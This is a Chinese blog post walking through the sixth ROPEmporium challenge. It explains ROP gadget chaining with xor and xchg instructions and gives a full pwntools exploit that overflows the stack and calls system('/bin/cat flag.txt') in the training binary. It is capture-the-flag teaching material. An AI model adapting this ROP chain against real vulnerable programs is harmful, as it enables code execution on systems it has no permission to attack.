ROPEmporium通关全解(六)

最新推荐文章于 2023-04-02 16:45:08 发布
最新推荐文章于 2023-04-02 16:45:08 发布
阅读量256 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/103679944
版权

前言
1.关于ROP
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)
ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。
2. 本系列rop实战题目的背景
来自ROPEmporium
旨在通过解决一系列挑战来一步步进阶学习ROP利用技术。

操作

先看一下基本信息
在这里插入图片描述然后载入r2分析
在这里插入图片描述在这里插入图片描述分别看看pwnme和usefulFunction
在这里插入图片描述在这里插入图片描述可以看到这些结构和之前的关卡基本相同
那覆盖rsp所需的偏移量呢?
可以自己做一遍
这里直接给出答案,偏移量还是40字节
然后使用ropgadget找到有用的gadget
在这里插入图片描述
首先我们要找到一个gadget用于将字符串写入内存
mov适合的似乎只有下面这一条
在这里插入图片描述如果用了这一条,那么下一个要解决的问题就是怎么将值写入r10、r11寄存器呢
似乎没有可直接写的办法,这时候我们常用的解决办法就是组合多个gadget以将值写入r10为例,我们看看该如何操作
那么这里就需要注意了,按照前面的默认命令,其实ropgadget的搜索深度是10
在这里插入图片描述既然我们需要组合多个gadget,既然越多越多,所以我们可以加上—depth 20,将深度设为20
在这里插入图片描述首先清空r11,有两个办法,要么置零,要么与自身异或
我们看看gadget里有没有符合的
在这里插入图片描述找到了
接下来把地址pop到r12里
对应的gadget为
在这里插入图片描述前面r11已经是0了,我们将r12与r11异或,这样其实就相当于间接地使用了mov,将值写入了r11
对应的gadget为
在这里插入图片描述然后使用xchg交换r11和r10寄存器的值,这样就相当于将地址写到了r10寄存器中
这样就实现了我们的目的
做完这部分工作之后,我们只需pop rdi,ret,字符串的地址作为system()参数传入,再调用system()就可以了
完整代码在6.py

from pwn import *


def place_address(address):
    payload = p64(0x0000000000400822) # xor r11, r11; pop r14; mov edi, 0x601050; ret;
    payload += p64(0) # Unused pop r14
    payload += p64(0x0000000000400832) # pop r12; mov r13d, 0x604060; ret;
    payload += p64(address)
    payload += p64(0x000000000040082f) # xor r11, r12; pop r12; mov r13d, 0x604060; ret;
    payload += p64(0) # Unused pop r12
    payload += p64(0x0000000000400840) # xchg r11, r10; pop r15; mov r11d, 0x602050; ret;
    payload += p64(0) # Unused pop r15
    return payload

def place_data(data):
    payload = p64(0x0000000000400822) # xor r11, r11; pop r14; mov edi, 0x601050; ret;
    payload += p64(0) # Unused pop r14
    payload += p64(0x0000000000400832) # pop r12; mov r13d, 0x604060; ret;
    payload += data # String to be putted
    payload += p64(0x000000000040082f) # xor r11, r12; pop r12; mov r13d, 0x604060; ret;
    payload += p64(0) # Unused pop r12
    return payload

def write_data(string, address):
    while len(string) % 8 != 0:
          string += "\x00"

    splitted_string = [string[i:i + 8] for i in range(0, len(string), 8)]
    payload = ""

    for i in range(len(splitted_string)):
        # Put address into r10 register
        payload += place_address(address + (i * 8))

        # Now we have to put actual data in r11
        payload += place_data(splitted_string[i])

        # Write data to address
        payload += p64(0x000000000040084e) # mov qword ptr [r10], r11; pop r13; pop r12; xor byte ptr [r10], r12b; ret; 
        payload += p64(0) * 2 # Unused pop r13 and pop r12
         
    return payload

offset = cyclic(40)
offset += write_data("/bin/cat flag.txt", 0x601050)
offset += p64(0x00000000004008c3)
offset += p64(0x601050)
offset += p64(0x00400810)

print(offset)

运行如图

在这里插入图片描述

Elwood Ying
关注
ROPEmporium通关全解(一)
Yale的博客
12-24 1067
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战目的背景 来自ROPEmporium 旨在通...
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 990
暑假刷计划-0x00 水平有限,这些只是前面大部分目的WP,最后几道暂时没做 目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
ROPEmporium通关全解(四)
Yale的博客
12-24 392
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战目的背景 来自ROPEmporium...
ROPEmporium通关全解(二)
Yale的博客
12-24 398
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战目的背景 来自ROPEmporium 旨在通...
ROPEmporium通关全解(五)
Yale的博客
12-24 355
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战目的背景 来自ROPEmporium...
英语四级作文通关秘籍.docx
02-20
【英语四级作文通关秘籍】是针对中国大学生备考英语四级和级考试中写作部分的策略指导。英语四级考试是中国高校普遍认可的英语能力测试,其作文部分对于考生的语言综合运用能力有着较高的要求。以下是根据秘籍...
韩国通关号免费查询系统,韩国清关码校验
09-26
今天给大家带来的是韩国通关码反查纠错系统于2022年9月26日的升级内容介绍。 第一,系统以浏览器插件的形式呈现,后期将会一同发布网站系统。 第二,系统再次启用了批量通关码信息校验的功能,我们的老用户可能并...
高项32小时通关.pdf
06-24
知识点:软考高级项目管理师相关法律法规和标准 - 国内外项目管理标准和规范 - 软考高级项目管理师考试规范 - 相关法律法规对项目管理的影响 - IT项目管理中的合规性和伦理 知识点七:信息技术发展对项目管理的...
WebGoat通关详解.zip
最新发布
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问,从基础到高级,...
系统架构设计师考试32小时通关.pdf
05-29
系统架构设计师考试32小时通关.pdf。该书2018年出版,作者:薛大龙,李海龙,吴芳茜,邹月平,黄俊玲 著。51CTO学院的书。考系统架构设计师的可以拿去参考
ROP Emporium x86_64 7~8
CoLin的pwn小屋
04-21 390
ROP Emporium x64 7-8
ROP Emporium x86_64 1~6
CoLin的pwn小屋
04-09 3296
ROP Emporium x64 1-6
基本ROPROPgadget
qq_62539372的博客
04-02 922
把对应获取 shell 的系统调用的参数放到对应的寄存器中,那么我们在执行 int 0x80 就可执行对应的系统调用。例: bamboofox 中的 ret2syscall。检查保护机制 堆栈不可执行 随机地址没开。获得 /bin/sh 字符串对应的地址。寻找控制 ebx 的gadgets。寻找控制 eax 的gadgets。利用gadgets获得shell。bx bin/sh的地址。int 80 的地址。
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 1899
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1210
PWN
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
热门推荐
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件中搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
小白详解rop emporium
BadRer的博客
08-02 2116
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
ROPgadget - Gadgets finder and auto-roper
核桃树
01-21 4597
Description This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectu
高级ROP
听鬼哥说故事
08-29 4973
高级ROP其实和一般的ROP基本一样,其主要的区别在于它利用了一些比较有意思的gadgets。
upload-labs19关通关
07-28
- *1* *2* [upload-labs详解1-19关通关全解(最全最详细一看就会)](https://blog.csdn.net/qq_53003652/article/details/129969951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值